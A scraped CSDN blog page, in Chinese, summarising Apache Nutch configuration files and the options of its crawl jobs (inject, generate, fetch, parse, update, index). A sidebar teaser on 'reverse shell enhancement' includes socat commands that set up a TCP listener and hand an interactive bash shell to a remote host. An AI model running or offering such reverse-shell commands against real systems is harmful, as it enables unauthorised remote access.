nutch的一些基础整理

原创
2015年03月22日 18:18:01

        <ul class="article_tags clearfix csdn-tracking-statistics" data-mod="popu_377">

            <li class="tit">标签：</li>

                                                        <li><a href="http://so.csdn.net/so/search/s.do?q=nutch&amp;t=blog" target="_blank">nutch</a> <span style="display: none;">/</span></li>

                                <!--          [endarticletags]-->

        </ul>

        <ul class="right_bar">

            <li><button class="btn-noborder"><i class="icon iconfont icon-read"></i><span class="txt">240</span></button></li>

            <li class="edit" style="display: none;">

                <a class="btn-noborder" href="http://write.blog.csdn.net/postedit/44539479">

                    <i class="icon iconfont icon-bianji"></i><span class="txt">编辑</span>

                </a>

            </li>

            <li class="del" style="display: none;">

                <a class="btn-noborder" onclick="javascript:deleteArticle(fileName);return false;">

                    <i class="icon iconfont icon-shanchu"></i><span class="txt">删除</span>

                </a>

            </li>

        </ul>

    </div>

    <div id="article_content" class="article_content csdn-tracking-statistics" data-mod="popu_519" data-dsm="post">

一、关于配置文件：

nutch-default.xml：爬虫的默认配置。在${nutch_home}/conf目录。

nutch-site.xml：理论上是nutch-default.xml的覆盖。

core-default.xml, hdfs-default.xml, mapred-default.xml：用于配置 Hadoop，与 hadoop-core-xxx.jar 相关。

mapred- default.xml：用于nutch的map-reduce配置。

hdfs-default.xml：用于在 Nutch 中实现 DFS。

regex-urlfilter.txt：从seed.txt读取URL和写入crawldb时，先过 regex-pattern。

二、关于表：

1、两类表webpage和host

2、gora映射放在${nutch_home}/conf目录gora*.xml文件

3、使用的数据库类型在gora.properties文件中配置，并有对应的映射文件。

三、种子文件seed.txt

1、每行一个种子url，可以自定义任何参数，并存到webpage的metadata字段。定义nutch.score、nutch.fetchInterval两个参数时可覆盖配置文件里的db.score.injected、db.fetch.interval.default两个配置。

2、每次injector时文件里的url都会先Normalizers再过filter

四、GeneratorJob

Usage: GeneratorJob [-topN N] [-crawlId id] [-noFilter] [-noNorm] [-adddays numDays]
Usage: GeneratorJob [-topN N] [-crawlId id] [-noFilter] [-noNorm] [-adddays numDays]
1、-topN <N>：在每次迭代中限制爬行的头几个链接数，默认是Integer.MAX_VALUE

2、-crawlId <id> ：默认是storage.crawl.id配置

3、-noFilter：不使用过滤器

4、-noNorm：不Normalizers URL

5、-adddays：当前时间增加numDays天。可以影响什么时候爬取，相当于抓取的参考时间。fetchTime <= curTime时，表示可以抓取。

generat前对URL进行normalize后过URLFilters（跟InjectorJob里的是同一个）。所以，通过DbUpdaterJob产生的新行（outlinks）只有在这里filter掉，以致后边的步骤不处理，但这些url依然会躺在webpage里，谁知道那天filter被修改后会不会用到这些URL。

五、FetcherJob

Usage: FetcherJob (<batchId> | -all) [-crawlId <id>]
Usage: FetcherJob (<batchId> | -all) [-crawlId <id>]
1、-resume：恢复中断的工作

2、-numTasks：任务数，<1时使用默认值mapred.map.tasks

这个时候只是把任务中可抓取的URL进行抓取,并更新数据库里的抓取时间及结果、状态等数据。这时webpage里有了url页面的html，并记录Content-Encoding、Content-Type、Server（nginx.etc.）、X-Via等字段。爬取时产生重定向的URL，过URLFilters和db.ignore.external.links后继续，重定向后的新URL作为原URL的outlink处理。

六、ParserJob

Usage: ParserJob (<batchId> | -all) [-crawlId <id>] [-resume] [-force]
Usage: ParserJob (<batchId> | -all) [-crawlId <id>] [-resume] [-force]
1、-resume：恢复之前未完成的

2、-force：强制重新解析已解析过的页面

这时对抓取过来的数据进行解析，也就是分析webpage里content字段的html，找出outlinks、OriginalCharEncoding、页面纯文字、标题、sig等字段。outlinks进行URLFilters和db.ignore.external.links。

七、DbUpdaterJob

1、其实就是根据数据库的情况更新一些权重字段，例如STATUS、Inlinks、Markers、Metadata、Score等

2、此时将把parser阶段解析到的outlinks生成新的webpage行，并且inlinks为上一步的url.。在mapper中根据outlinks生成scoreData后context.write，然后在reducer中产生新行。没有filter。只有计算score时有ScoringFilters。

3、www.sitename.com/和www.sitename.com/index.html被视为不同的抓取路径并产生两行记录

八、IndexingJob

将webpage中可索引的数据映射到NutchDocument，并扔给索引引擎。

nutch的一些基础整理的更多相关文章

机器学习 —— 基础整理（六）线性判别函数：感知器、松弛算法、Ho-Kashyap算法
这篇总结继续复习分类问题.本文简单整理了以下内容: (一)线性判别函数与广义线性判别函数 (二)感知器 (三)松弛算法 (四)Ho-Kashyap算法闲话:本篇是本系列［机器学习基础整理］在time ...
MySQL基础整理（一）之SQL基础（未完成）
大家好,我是浅墨竹染,以下是MySQL基础整理(一)之SQL基础 1.SQL简介 SQL(Structure Query Language)是一种结构化查询语言,是使用关系模型的数据库应用语言. 2. ...
[转帖]nginx基础整理
nginx基础整理 https://www.cnblogs.com/guigujun/p/6588545.html 目录结构如下: Nginx基础知识 Nginx HTTP服务器的特色及优点 Ngin ...
JAVA基础整理-集合篇（一）
集合作为JAVA的基础知识,本来感觉自己理解的很清楚了,但是在最近的一次面试中还是答得不尽如人意!再次做一下整理,以便加深理解以及随时查阅. 首先,java.util包中三个重要的接口及特点:List ...
关于JAVA面向对象基础整理以及个人的理解(适合初学者阅读)
JAVA的基础语法等都跟C有很大的相似之处,所以这里就不多啰嗦了.直接从数组开始. 数组: 1.声明 int [] a; 在声明的过程中,并没有分配空间给数组.我们可以在声明的同时,用new来分配相应 ...
C#基础整理
元旦整理书架发现一本小册子——<C#精髓>中国出版社2001年出版的,粗略翻了下关于C#的知识点挺全的虽然内容谈得很浅也有很多过时的内容(话说这本书是我在旧书店花5块钱淘的)我保留原有章节 ...
HTML5游戏开发技术基础整理
随着HTML5标准终于敲定.HTML5将有望成为游戏开发领域的的热门平台. HTML5游戏能够执行于包含iPhone系列和iPad系列在内的计算机.智能手机以及平板电脑上,是眼下跨平台应用开发的最佳实 ...
js数组基础整理
首页: 主要整理了一下数组中常用的一些基础知识,代码都是自己手敲,有不对的地方希望能指出,目前只有4篇,后续会不断的增加这一板块. 由于少于100字不能发所以把一些最基本的创建数组也写上. // 创建 ...
机器学习 —— 基础整理（四）特征提取之线性方法：主成分分析PCA、独立成分分析ICA、线性判别分析LDA
本文简单整理了以下内容: (一)维数灾难 (二)特征提取--线性方法 1. 主成分分析PCA 2. 独立成分分析ICA 3. 线性判别分析LDA (一)维数灾难(Curse of dimensiona ...

随机推荐

4418: [Shoi2013]扇形面积并|二分答案|树状数组
为何感觉SHOI的题好水. ..又是一道SB题从左到右枚举每个区间,遇到一个扇形的左区间就+1.遇到右区间就-1,然后再树状数组上2分答案,还是不会码log的.. SHOI2013似乎另一道题发牌也 ...
怎样在Java中运行Hive命令或HiveQL
这里所说的在Java中运行Hive命令或HiveQL并非指Hive Client通过JDBC的方式连接HiveServer(or HiveServer2)运行查询,而是简单的在部署了HiveServe ...
2015 Multi-University Training Contest 2 1006 Friends 壮压
题目链接题意:t 组測试数据,每组測试数据有 n个人,m条关系每条关系能够是 "线上关系" 或者 "线下关系". 要求每一个人的线上关系(条数) == 线下 ...
基于FPGA的VGA可移植模块终极设计
一.VGA的诱惑首先,VGA的驱动,这事,一般的单片机是办不到的:由于FPGA的速度,以及并行的优势,加上可现场配置的优势,VGA的配置,只有俺们FPGA可以胜任,也只有FPGA可以随心所欲地配置( ...
edit filter rules in sql source control
https://documentation.red-gate.com/soc6/common-tasks/exclude-objects-using-filters 如果有人上传了filter,nam ...
ES等待任务——是master节点上的task任务
等待中的任务编辑有一些任务只能由主节点去处理,比如创建一个新的索引或者在集群中移动分片.由于一个集群中只能有一个主节点,所以只有这一节点可以处理集群级别的元数据变动.在 99.9999% 的时间里 ...
DB-MySQL：MySQL 索引
ylbtech-DB-MySQL:MySQL 索引 1.返回顶部 1. MySQL 索引 MySQL索引的建立对于MySQL的高效运行是很重要的,索引可以大大提高MySQL的检索速度. 打个比方,如果 ...
maven的pom.xml配置标签
转自:https://blog.csdn.net/wf787283810/article/details/76188595 <project xmlns="http://maven.a ...
反向Shell增强
下载socat 在客户端: socat file:`tty`,raw,echo=0 tcp-listen:4444 在服务端: socat exec:'bash -li',pty,stderr,set ...
ZYQAssetPickerController的使用，不错的图片选择
import UIKit class ViewController: UIViewController,ZYQAssetPickerControllerDelegate,UIImagePickerCo ...

nutch的一些基础整理

nutch的一些基础整理

nutch的一些基础整理的更多相关文章

随机推荐

热门专题